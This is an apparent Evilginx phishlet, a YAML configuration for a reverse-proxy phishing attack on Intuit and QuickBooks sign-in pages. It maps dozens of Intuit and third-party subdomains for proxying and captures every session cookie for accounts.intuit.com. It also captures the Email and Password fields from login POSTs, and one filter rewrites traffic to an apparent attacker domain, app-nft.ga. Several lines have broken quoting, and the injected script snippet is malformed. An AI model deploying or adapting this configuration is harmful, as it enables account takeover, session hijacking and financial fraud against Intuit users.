  GNU nano 6.4                                                                                                             phishlets/intuit.yaml
author: '@hood'
min_ver: '2.4.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'intuit.com', session: true, is_landing: true}
  - {phish_sub: '', orig_sub: '', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'gstatic', orig_sub: 'www', domain: 'gstatic.com', session: false, is_landing: false}
  - {phish_sub: 'fonts', orig_sub: 'fonts', domain: 'gstatic.com', session: false, is_landing: false}
  - {phish_sub: 'tsheets', orig_sub: 'tsheets', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'eventbus', orig_sub: 'eventbus', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'plugin', orig_sub: 'plugin', domain: 'intuitcdn.net', session: false, is_landing: false}
  - {phish_sub: 'sci', orig_sub: 'sci', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'gfp', orig_sub: 'gfp', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'selfemployed', orig_sub: 'selfemployed', domain: 'intuit.com', session: true, is_landing: true}
  - {phish_sub: 'merchantcenter', orig_sub: 'merchantcenter', domain: 'intuit.com', session: true, is_landing: true}
  - {phish_sub: 'app.qbo', orig_sub: 'app.qbo', domain: 'intuit.com', session: true, is_landing: true}
  - {phish_sub: 'qbo', orig_sub: 'qbo', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'iop', orig_sub: 'iop', domain: 'intuit.com', session: true, is_landing: true}
  - {phish_sub: 'rum.api', orig_sub: 'rum.api', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'quickbooks', orig_sub: 'quickbooks', domain: 'intuit.com', session: true, is_landing: true}
  - {phish_sub: 'camps', orig_sub: 'camps', domain: 'intuit.com', session: true, is_landing: true}
  - {phish_sub: 'sh.api', orig_sub: 'sh.api', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'modelexecution.api', orig_sub: 'modelexecution.api', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'webs-entitled-products.api', orig_sub: 'webs-entitled-products.api', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'profile-aws.api', orig_sub: 'profile-aws.api', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'logging.api', orig_sub: 'logging.api', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'uxfabric', orig_sub: 'uxfabric', domain: 'intuitcdn.net', session: false, is_landing: false}
  - {phish_sub: 'segment', orig_sub: 'segment', domain: 'intuitcdn.net', session: false, is_landing: false}
  - {phish_sub: 'trinity.platform', orig_sub: 'trinity.platform', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'digitalasset', orig_sub: 'digitalasset', domain: 'intuit.com', session: false, is_landing: false}
  - {phish_sub: 'api', orig_sub: 'api', domain: 'segment.io', session: false, is_landing: false}
  - {phish_sub: 's', orig_sub: 's', domain: 'go-mpulse.net', session: false, is_landing: false}
  - {phish_sub: 'c', orig_sub: 'c', domain: 'go-mpulse.net', session: false, is_landing: false}
  - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false}
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'intuit.com', session: true, is_landing: true}
sub_filters:
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'accounts', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'www', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'www.intuit.com', orig_sub: 'www', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'eventbus', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'rum.api', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'webs-entitled-products.api', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'profile-aws.api', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'logging.api', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'digitalasset', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'api', domain: 'segment.io', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'modelexecution.api', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'sh.api', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'trinity.platform', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'uxfabric', domain: 'intuitcdn.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'segment', domain: 'intuitcdn.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'plugin', domain: 'intuitcdn.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'merchantcenter.intuit.com', orig_sub: 'merchantcenter', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'app.qbo.intuit.com', orig_sub: 'app.qbo', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'iop.intuit.com', orig_sub: 'iop', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'quickbooks.intuit.com', orig_sub: 'quickbooks', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'sci', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'gfp', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'tsheets.intuit.com', orig_sub: 'tsheets', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'selfemployed.intuit.com', orig_sub: 'selfemployed', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'qbo.intuit.com', orig_sub: 'qbo', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'camps.intuit.com', orig_sub: 'camps', domain: 'intuit.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript]} 
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname}/', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'fonts', domain: 'gstatic.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript]} 
  - {triggers_on: 'accounts.intuit.com', orig_sub: 's', domain: 'go-mpulse.net', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript]} 
  - {triggers_on: 'accounts.intuit.com', orig_sub: 'c', domain: 'go-mpulse.net', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript]} 
  - {triggers_on: 'rum.api.intuit.com', orig_sub: 'rum.api', domain: 'intuit.com', search: 'https://{accounts.intuit.com}/', replace: 'https://{accounts.app-nft.ga}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript]} 
auth_tokens:
  - domain: 'accounts.intuit.com'
    keys: [".*,regexp"]
credentials:
    username:
     key: 'Email'
     search: '(.*)'
     type: 'post'
    password:
     key: 'Password'
     search: '(.*)'
     type: 'post'
auth_urls:
  - '/app/account-manager/overview'
login:
  domain: 'accounts.intuit.com'
  path: '/app/sign-in?app_group=QBO&asset_alias=Intuit.accounting.core.qbowebapp&iux_tests=47287%3A11%3A113998&redirect_uri=https%3A%2F%2Fapp.qbo.intuit.com%2Fapp%2Fcompanyselection%3FloadCustomerAssistanceAssets%3Dus&loadCustomerAssistanceAssets=us'
js_inject:
  - trigger_domains: ["accounts.intuit.com"]
    trigger_paths: ["/app/sign-in"]
    trigger_params: ["app_group=QBO", "asset_alias=Intuit.accounting.core.qbowebapp", "iux_tests=47287:11:113998", "redirect_uri=https://app.qbo.intuit.com/app/companyselection?loadCustomerAssistanceAssets=us", "loadCustomerAssistanceAssets=us"]
    script: |
       src=" https://www.google.com/recaptcha/enterprise.js?onload=onloadcallback&render=explicit&hl=en" integrity="sha256-< sha384-0UmWi2drUOFtiIl9tXA3B9fWn6Oz5K3vecq0zC8vAzesBQkPzPdlJKXnimDbxieW>"